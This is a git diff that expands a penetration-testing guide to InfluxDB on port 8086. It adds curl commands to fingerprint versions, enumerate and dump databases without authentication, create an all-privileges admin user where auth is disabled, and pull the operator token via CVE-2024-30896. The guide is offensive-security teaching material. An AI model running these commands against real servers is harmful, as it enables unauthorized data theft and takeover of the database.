diff --git a/src/network-services-pentesting/8086-pentesting-influxdb.md b/src/network-services-pentesting/8086-pentesting-influxdb.md index a6555a2a5ff..654eb9cc2f4 100644 --- a/src/network-services-pentesting/8086-pentesting-influxdb.md +++ b/src/network-services-pentesting/8086-pentesting-influxdb.md @@ -13,6 +13,21 @@ PORT STATE SERVICE VERSION 8086/tcp open http InfluxDB http admin 1.7.5 ``` +## Identify & Version (HTTP) + +- v1.x: `GET /ping` returns status 204 and headers like `X-Influxdb-Version` and `X-Influxdb-Build`. +- v2.x+: `GET /health` returns JSON with the server version and status. Works without auth. + +```bash +# v1 banner grab +curl -i http://:8086/ping + +# v2/compat health +curl -s http://:8086/health | jq . +``` + +Tip: exposed instances often also serve Prometheus-style metrics at `/metrics`. + ## Enumeration From a pentester point of view this another database that could be storing sensitive information, so it's interesting to know how to dump all the info. @@ -22,8 +37,8 @@ From a pentester point of view this another database that could be storing sensi InfluxDB might require authentication or not ```bash -# Try unauthenticated -influx -host 'host name' -port 'port #' +# Try unauthenticated CLI (v1 shell) +influx -host -port 8086 > use _internal ``` @@ -35,9 +50,50 @@ influx –username influx –password influx_pass There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) -### Manual Enumeration +### Manual Enumeration (v1 HTTP API / InfluxQL) + +Even when no CLI is available, the HTTP API is usually exposed on port 8086. + +```bash +# List databases (unauth) +curl -sG "http://:8086/query" --data-urlencode "q=SHOW DATABASES" + +# List retention policies of a DB +curl -sG "http://:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf" + +# List users (if auth disabled) +curl -sG "http://:8086/query" --data-urlencode "q=SHOW USERS" -The information of this example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/). +# List measurements (tables) +curl -sG "http://:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS" + +# List field keys (columns) +curl -sG "http://:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS" + +# Dump data from a measurement +curl -sG "http://:8086/query" \ + --data-urlencode "db=telegraf" \ + --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq . + +# Force epoch timestamps (useful for tooling) +curl -sG "http://:8086/query" \ + --data-urlencode "epoch=ns" \ + --data-urlencode "db=telegraf" \ + --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' +``` + +> [!WARNING] +> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"` + +If authentication is disabled, you can even create users and escalate: + +```bash +# Create an admin user (v1, auth disabled) +curl -sG "http://:8086/query" \ + --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES" +``` + +The information of the following CLI example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/). #### Show databases @@ -109,13 +165,60 @@ time cpu host usage_guest usage_guest_nice usage_idle 1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101 ``` -> [!WARNING] -> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"` +### InfluxDB v2.x API (Token-based) + +InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate: + +```bash +# Basic org, bucket, and auth discovery +TOKEN=""; H="-H Authorization: Token $TOKEN" + +# Health & version +curl -s http://:8086/health | jq . + +# List organizations +curl -s $H http://:8086/api/v2/organizations | jq . + +# List buckets +curl -s $H 'http://:8086/api/v2/buckets?limit=100' | jq . + +# List authorizations (requires perms) +ORGID= +curl -s $H "http://:8086/api/v2/authorizations?orgID=$ORGID" | jq . + +# Query data with Flux +curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \ + -X POST http://:8086/api/v2/query \ + --data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)' +``` + +Notes +- For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests. +- In v2, the HTTP `Authorization` header must be in the form `Token `. -### Automated Authentication +### Automated Enumeration ```bash msf6 > use auxiliary/scanner/http/influxdb_enum ``` +### Recent vulns and privesc of interest (last years) + +- InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test: + +```bash +# Using a low-priv/all-access token tied to the default org +curl -s -H 'Authorization: Token ' \ + 'http://:8086/api/v2/authorizations?orgID=' | jq . +# Look for entries of type "operator" and extract the raw token (if present) +``` + +- Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you. + + + +## References + +- InfluxData docs: InfluxDB v1/v2 HTTP API reference (endpoints like `/ping`, `/health`, `/query`, `/api/v2/authorizations`). +- CVE-2024-30896 operator token exposure in InfluxDB OSS 2.x. {{#include ../banners/hacktricks-training.md}}